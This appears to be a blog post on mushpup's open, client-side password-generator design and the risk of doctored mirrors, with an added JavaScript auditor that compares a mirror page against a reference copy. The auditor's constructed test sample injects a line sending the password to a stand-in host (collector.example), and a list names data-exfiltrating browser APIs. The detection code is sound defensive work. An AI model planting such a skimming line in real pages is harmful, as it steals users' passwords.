the mushpup open philosophy
One of the ideas central to mushpup, and one that distinguishes it from something like roboform or eWallet, is its (free) decentralized model. It doesn't store anything and it isn't limited to your desktop computer. And thanks to the Google Subversion repository, JavaScript and browsers, it can easily be installed anywhere.
This is its beauty and also its vulnerability. If mushpup forms were to proliferate, as they now easily could, someone could maliciously put a doctored mushpup form up on their website, offer it as a mirror, and start stealing plaintext passwords. I can imagine ways to address this risk programmatically. But they would be complicated (something also contrary to the mushpup keep-it-simple philosophy) and would inevitably be defeated.
The best solution, and perhaps the only one, is sunlight. Everything is and always should be open to inspection. The code is JavaScript, meaning that it runs on the client -- that is, in a browser on your machine, not on a server, where your data could be stored in a database or logged. That also means that you should be able to inspect the code you're running by viewing the source. And because the code is available at its googlecode repository, you'll always have a reference for comparison.
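The comparison against a reference copy described above can be partly scripted. This is an added example, not mushpup's own code: the function names, the sample pages and the list of APIs are assumptions made for illustration, and an empty result is a prompt to read the source, not a substitute for it.

```javascript
// Added example: function names, sample pages and heuristics are constructed, not mushpup's code.
// Collect every <script> on a page: external src (if any) and whitespace-normalized inline body.
function extractScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    out.push({ src: src ? src[1] : null, body: m[2].replace(/\s+/g, " ").trim() });
  }
  return out;
}

// Form targets: a client-only form should not submit anywhere the reference does not.
function formActions(html) {
  const out = [];
  const re = /<form\b[^>]*?\baction\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// APIs that can move data off the page; worth a manual look if the reference lacks them.
const EGRESS = ["XMLHttpRequest", "fetch(", "sendBeacon", "new Image", "WebSocket", ".src ="];

function auditMirror(referenceHtml, mirrorHtml) {
  const findings = [];
  const ref = extractScripts(referenceHtml);
  const refBodies = new Set(ref.map((s) => s.body));
  const refSrcs = new Set(ref.map((s) => s.src));
  const refText = ref.map((s) => s.body).join(" ");
  for (const s of extractScripts(mirrorHtml)) {
    if (s.src && !refSrcs.has(s.src)) findings.push("external script not in reference: " + s.src);
    if (s.body && !refBodies.has(s.body)) findings.push("inline script differs from reference");
    for (const api of EGRESS) {
      if (s.body.includes(api) && !refText.includes(api)) findings.push("network-capable API: " + api);
    }
  }
  const refActions = new Set(formActions(referenceHtml));
  for (const a of formActions(mirrorHtml)) {
    if (!refActions.has(a)) findings.push("form action not in reference: " + a);
  }
  return findings;
}

// Constructed sample pages (not real mushpup markup); standIn is a placeholder function.
const REFERENCE = '<form id="f"><input id="pw" type="password"></form>' +
  '<script>function standIn(s){ return s.split("").reverse().join(""); }</script>';
const DOCTORED = REFERENCE.replace("return s", 'new Image().src = "https://collector.example/?v=" + s; return s');
```

Calling `auditMirror(REFERENCE, DOCTORED)` returns one finding for the changed inline script and one for each network-capable API that the reference copy does not use.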
Just as important, we stress the fact that mushpup is designed specifically for low-security sites. Don't use it for your banking site (this is a situation for which something like roboform or passwordmaker might be better suited). The neat thing is: by using mushpup on your low-security sites, there's a good chance you're making your visits to high-security sites more secure by not using the same password there.
I've added a list of mushpup mirrors to the right here. These are the sites to which I've added the mushpup form myself. If you're not sure you trust me, feel free to inspect the code, grab it, and add it to your own site. Also keep in mind that mushpup is designed to allow anyone -- even the bad guys -- to do that. Your best security is awareness. And that is what mushpup ultimately promotes.